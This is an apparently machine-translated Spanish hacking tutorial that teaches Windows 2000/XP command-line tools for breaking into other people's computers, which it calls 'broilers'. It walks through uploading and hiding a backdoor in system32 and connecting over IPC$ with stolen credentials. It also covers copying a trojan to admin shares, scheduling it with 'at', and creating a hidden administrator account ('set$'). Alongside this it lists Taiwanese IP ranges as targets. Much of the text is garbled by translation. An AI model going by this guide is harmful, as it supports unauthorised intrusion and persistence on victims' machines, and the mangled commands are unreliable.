Comenzando con los comandos de DOS

Todos definitivamente usarán los comandos de DOS al invadir. Sus funciones son muy poderosas. Hoy daré una explicación detallada de los comandos de DOS más utilizados. Es principalmente para principiantes y aquellos que están expuestos a DOS. para amigos que tienen pocos comandos A continuación seleccionaré algunos de los más utilizados para hablar.

Tome Windows 2000 como ejemplo, Windows XP es similar.

DIR.

Muestra todas las carpetas y archivos en el disco actual.

El método más común es cargar una puerta trasera o un servidor (por ejemplo, el nombre es Systems.exe) en el asador. c:\winnt\ En system32, desea ver si la carga se realizó correctamente. Puede usar el comando DIR para verificar. El comando es el siguiente:

DIR c:\winnt\system32\systems. exe

Se mostrará:

2004-05-24 20:06 194,762 sistemas.exe

1 archivo 194,762 bytes

0 directorios 4,658, 597,888 bytes disponibles

Si no realiza la carga correctamente, la visualización será la siguiente:

El volumen en la unidad C no tiene etiqueta.

El número de serie del volumen es 6458-3DB8

Directorio de c:\winnt\system32\

Archivo no encontrado

CD

Cambiar el directorio actual

Mira en detalle el siguiente comando:

C:\gt cd winnt //Ingresa a la carpeta winnt

C:\winntgt; cd system32 //Ingresa a la carpeta system32

C:\winnt\system32gt;cd.. //Regresa al directorio anterior

C: \winntgt ;cd..

C:\gt;

C:\gt;d: //Ingrese la unidad D

D:\gt;e : / /Ingrese la unidad E

E:\gt;

del y deltree

DEL: eliminar archivos.

Consulte lo siguiente comando:

C:\gt; del c:\xx\ww.txt //Elimina el archivo llamado WW en el directorio XX de la unidad C.

C:\gt ;

C:\gt; del c:\xx\*.* //Eliminar todos los archivos en el directorio XX de la unidad C

deltree

Esta es una propiedad más destructiva, no solo puede eliminar todos los archivos, sino también eliminar carpetas

C:\gt;deltree c:\winnt //Eliminar todos los archivos y carpetas winnt en la unidad C.

Debes usar esto con precaución.

attrid

Mostrar y cambiar atributos de archivos o carpetas.

Para ocultar los atributos de un archivo o carpeta, use la letra H significa Solo lectura, representado por R. Archivo, representado por A. Sistema, representado por S

Para cambiar un atributo de archivo o carpeta, " " significa agregar, " - " significa eliminar. un atributo.

Por lo general, colocamos la puerta trasera o el servidor en c:\winnt\system32 donde cargamos el asador. Después de ingresar el CMD del asador, para evitar que el administrador del asador lo sepa. subirlo Oculto Por ejemplo, el comando Systems.exe anterior

es el siguiente:

C:\gt;attrid h c:\winnt\system32\systems.exe //Esto camino en system32 Systems.exe no se puede encontrar

C:\gt;attrid -h c:\winnt\system32\systems.exe //Eliminar los atributos ocultos de Systems.exe

copiar

Copie uno o más archivos a otros directorios

Por ejemplo, si copia un archivo llamado 1.txt en la unidad C a la carpeta vv en la unidad D,

C:\gt;copiar c

:\1.txt d:\vv\1.exe

Por ejemplo, ha establecido una conexión IPC$ con el asador (¿cómo conectarse? Hablaré de ello más adelante), y el asador tiene abierto *** compartiendo, aquí hay un ejemplo. La unidad D está abierta. Puede cargar una puerta trasera o un servidor llamado Systems.exe desde su unidad C a la unidad D del asador. El comando es el siguiente:

. C:\gt; copiar c:\systems .exe \\broiler IP\d$

tipo

Mostrar contenido del archivo

Ahora creo uno nuevo llamado hack en el directorio XX de mi archivo txt de la unidad C, el contenido son algunas IP taiwanesas

El comando es el siguiente:

C:\gt; \hack.txt

El número de serie comienza la dirección IP Dirección IP final País/Provincia/Municipio Ciudad/Distrito/Condado/Organización

58 024.179.140.000 024.179.150.255 Provincia China de Taiwán

80 061.013.000.000 061.013.255.255 Provincia china de Taiwán

86 061.058.065.000 061.058.070.255 Provincia china de Taiwán

87 061.059.160.000 061.059.255 .255 Provincia de Taiwán de China

89 061.070.100.000 061.070.150 .255 Provincia de Taiwán, China

1788 061.217.179.000 061.217.179.255 Ciudad de Tainan, Provincia de Taiwán, China

1789 061.216.000.000 061.219.255.255 Provincia de Taiwán, China

1790 061.220.080.000 0 61.220. 150.255 Ciudad de Taipei, Provincia de Taiwán, China

1791 061.224.000.000 061.2 24.255.255 Taipéi Ciudad, Provincia de Taiwán, China

1792 061.225.000.000 061.225.255.255 Provincia de Taiwán, China

3390 134.208.000.000 134.208.255.255 China Taiwán

3584 139.175. 000.000 139.175.255.255 Provincia China de Taiwán

3593 140.096.000.000 140.096.255.255 Provincia China de Taiwán

3596 140.112.000.000 140.112.255.255 Universidad Nacional de Taiwán de Provincia China de Taiwán

C:\gt;

También una forma de usarlo es verificar qué sistema operativo está usando el asador después de ingresar el CMD del asador. El resultado de. el funcionamiento en mi computadora es el siguiente:

C:\gt; escriba c:\boot .ini

[cargador de arranque]

timeout=30

predeterminado=multi(0)disco(0)rdisco(0)partición(1)\WINDOWS

p>

[sistemas operativos]

multi(0)disco(0)rdisco(0)partición(1)\WINDOWS="Microsoft WindowsXP Professional"

/fastdetect

¿Puedes darte cuenta? Estoy usando el sistema XP.

Estos son algunos comandos que creo que se usan comúnmente. Otros incluyen rd, md, etc. Si estás interesado, puedes hacerlo. busque información. Mire, ping se usa relativamente raramente.

ping

Este es el comando más utilizado pero ahora parece que no funciona en la mayoría de los sitios web y computadoras personales. use firewalls para bloquear el ping La mayoría de las veces, P está bloqueado Comandos básicos:

ping ip

URL de ping

La siguiente P es nuestro sitio web:

C:\gt;ping www.hf110.com

Haciendo ping a www.hf110.com [218.89.0.231] con 32 bytes de datos:

Responder de 218.89.0.231: bytes= 32 tiempo=67ms TTL=116

Respuesta de 218.89.0.231: bytes=32 tiempo=67ms TTL=116

Respuesta de 218.89.0.231: bytes =32 tiempo=66ms TTL= 116

Respuesta de 218.89.0.231: bytes=32 tiempo=67ms TTL=116

Estadísticas de ping para 218.89.0.231:

Paquetes: Enviados = 4, Recibidos = 4, Perdidos = 0 (0 pérdida),

Tiempos aproximados de ida y vuelta en milisegundos:

Mínimo = 66 ms, Máximo = 67 ms, Promedio = 66 ms

La IP de este sitio es 218.89.0.231. A partir del TTL = 116, se puede ver aproximadamente que se utiliza el sistema operativo Windows. En términos generales, si el valor TTL es de alrededor de 128. es un sistema operativo Windows, y si el valor TTL es alrededor de 225, la mayoría de ellos son sistemas Unix. Pero hay casos especiales en los que el administrador puede modificar el valor TTL cambiando el registro.

uso neto.

Al obtener el nombre de usuario y la contraseña del asador, luego puede usar este comando para realizar una conexión IPC$

net use \\broiler ip\ipc$ "contraseña" /user: "nombre de usuario"

Después de que la conexión sea exitosa, cargue la puerta trasera o el servidor (por ejemplo, llamado sistemas.exe, en su unidad D).

copia D: \systems.exe \\broiler ip\c$ //Aquí debe estar abierto para compartir. Puede cargarlo. De lo contrario, la carga no se podrá realizar correctamente.

net time \\broiler ip //Mira. a la hora del asador, es un reloj de 24 horas. Por ejemplo, aquí son las 3:10 p.m. Escribiendo 15:10

at \\broiler ip 15:12 Systems.exe //A las 15. :12, ejecuta sy

stems.exe

Aquí, si subiste un troyano de rebote, puedes esperar a que se conecte contigo. De hecho, hay muchas contingencias durante el proceso de intrusión. Por ejemplo, como se muestra arriba, puedes hacerlo. conectarse correctamente a través de IPC Pero no es necesariamente posible ver la hora del asador a través de la hora neta \\ ip del asador. Incluso si puede ver la hora, a veces el servicio de encendido del asador no está encendido. , es posible que la puerta trasera o el servidor no tengan la oportunidad de ejecutarse.

Puede ser detectado por el software antivirus. Por lo tanto, la falla es común durante el proceso de intrusión. Si este método no funciona, puede intentarlo. otro.

net user

Ver usuarios o crear uno nuevo.

Esta es una captura de pantalla en mi computadora

C: \gt;usuario de red

\\cuenta de usuario BILLGATES

-------------------------- ------------- -----------------------

Invitado guest1 HelpAssistant

SUPPORT_388945a0 yhkj

El comando se completó correctamente.

C:\gt;

Los anteriores son todos mis usuarios.

Ahora creo un nuevo usuario setwell, la contraseña es 123456, la captura de pantalla es como sigue

C:\gt;net user setwell 123456 /add

El comando se completó con éxito.

C:\gt;net localgroup Administrators setwell /add //Este comando es para agregar setwell como administrador

El comando se completó con éxito.

A continuación veremos el usuario de red, la imagen es la siguiente

C:\gt;usuario de red

\\cuenta de usuario de BILLGATES

------------------------------------------------ - --------------

Invitado invitado1 Asistente de ayuda

setwell SUPPORT_388945a0 yhkj

El comando se completó correctamente.

El usuario creado se puede ver con el comando net user. Agregamos un $ después del usuario para ocultarlo un poco. Esta vez creamos un usuario llamado set. La captura de pantalla es la siguiente:

C:\gt;net user set$ 123456 /add

El comando se completó correctamente.

C:\gt;net localgroup Administrators set$ /add

El comando se completó exitosamente.

C:\gt;usuario de red

\\cuenta de usuario BILLGATES

---------------- - -------------------------------------------------

Invitado invitado1 Asistente de ayuda

setwell SUPPORT_388945a0 yhkj

El comando se completó correctamente.

C:\gt;

¿Viste eso? No vimos el conjunto de usuarios$ que acabamos de crear. Puedes usar este comando para verlo, administradores de grupo local neto. El comando muestra todos los administradores, la captura de pantalla es la siguiente:

C:\gt;net administradores de grupo local

Administradores de alias

Nota Los administradores tienen acceso ilimitado a ordenadores/dominios Acceso Completo

Miembro

------------------------------ -----------------------

invitado1

establecer$

establecer bien

yhkj

El comando se completó correctamente.

C:\gt;

¿Lo viste? Vimos el usuario set$.

Si deseas eliminar el usuario, usa este comando:

C:\gt;net user setwell /delete

net start

1. Iniciar algunos servicios

Por ejemplo: net start. telnet // Iniciar el servicio telnet

2. Verifique qué servicios están iniciados actualmente. Verifique qué servicios están iniciados en mi computadora:

C:\gt;net start

.

Se han iniciado los siguientes servicios de Windows:

Actualizaciones automáticas

Sistema de eventos COM

Servicios criptográficos

Cliente DHCP

Cliente de seguimiento de enlaces distribuidos

Cliente DNS

Servicio de informes de errores

Registro de eventos

Ayuda y soporte técnico

Servicios IPSEC

Administrador de discos lógicos

Messenger

Esto es sólo una parte del servicio.

net stop

p>

Detener algún servicio. El webmaster también lo mencionó hoy. No me queda mucho.

net share

Ver los recursos compartidos *** predeterminados. , marque estos *** recursos compartidos C$ D$ e $ f$ admin$ ipc$, este es el valor predeterminado del sistema. El mío está todo apagado.

Voy al asador para tomar una captura de pantalla.

C:\Documentos y configuraciones\ Administratorgt;net share

D$ D:\Default *** share

F$ F:\Default *** compartir

ADMIN$ C:\ WINNT Gestión remota

C$ C:\Default Sharing

E$ E:\Default Sharing

El comando se completó exitosamente.

C:\Documents and Settings\Administratorgt;

El beneficio IPC$*** de este asador está desactivado.

vista neta

También es una vista para compartir, pero no es la vista para compartir predeterminada anterior. Tomemos una captura de pantalla. También es una vista de parrilla,

C:\Documents and Settings\Administratorgt;net.

p>

Comentarios del nombre del servidor

------------------------------- --- -----------------------------------------------

\\17

\\HMZ

\\ZGH

El comando se completó correctamente.

C:\Documents and Settings\Administratorgt;

Aprender los comandos de DOS puede parecer un poco molesto, pero en realidad es bastante fácil de aprender y si lo aprendes bien, lo será. Juega un papel decisivo en la invasión. La próxima vez hablaremos sobre netstat y otros comandos.

netstat -an

Utilice este comando para ver todas las conexiones a la máquina. en la captura de pantalla en mi computadora

D:\gt;netstat -an

Conexiones activas

Proto Dirección local Estado de dirección extranjera

TCP 0.0.0.0: 135 0.0.0.0:0 ESCUCHANDO

TCP 0.0.0.0:1025 0.0.0.0:0 ESCUCHANDO

TCP 0.0.0.0:1029 0.0.0.0:0 ESCUCHANDO

TCP 0.0.0.0:5000 0.0.0.0:0 ESCUCHANDO

TCP 180.254.158.42:139 0.0.0.0:0 ESCUCHANDO

TCP 218.95.49.187 :2935 218.89.0.231:80 ESTABLECIDO

UDP 0.0.0.0:500 *:*

UDP 0.0.0.0:1035 *:*

UDP 0.0. 0.0:1037 *:*

UDP 0.0.0.0:1134 *:*

UDP 0.0.0.0:1136 *:*

Proto dirección local Dirección extranjera Estado

Protocolo puerto local y dirección IP estado del puerto remoto y dirección IP

ESCUCHAR el estado de escucha significa esperar a que la otra parte se conecte

ESTABLECIDO se está conectando.

El protocolo TCP es TCP

El protocolo UDP es UDP

TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLECIDO

Esto significa usar la ip nativa del protocolo tcp (218.95.49.187 a través del puerto: 2935 y la ip remota (218.89.0.231) puerto: conexión 80

consulta

Este comando solo abre el puerto 3389 (el puerto es no necesariamente 3389, tal vez cambiado a Hay otro puerto. Estrictamente hablando, debe usarse si el servicio de terminal remoto está activado. Usé un nombre de usuario de 1$ para iniciar sesión en una máquina 3389.

c:\ gt; consultar usuario

NOMBRE DE USUARIO NOMBRE DE SESIÓN ID ESTADO

consola de administrador 0 ejecutándose

1$ rdp-tcp#2

1 Ejecutando

Ves que no hay nada arriba, el administrador también está allí. Si deseas salir, usa el siguiente comando:

ID de cierre de sesión aquí es cierre de sesión 1.

p>

Esta es una salida normal. Hablando de salida, hay otra forma, que es iniciar---apagar---cerrar sesión 1$. Si usa otro método para salir, entonces cuando se apaga el asador. , aparecerá algo como esto. "Hay otro invitado que inició sesión en este servidor. Si cierra la sesión, los datos de la sesión de la otra parte se perderán".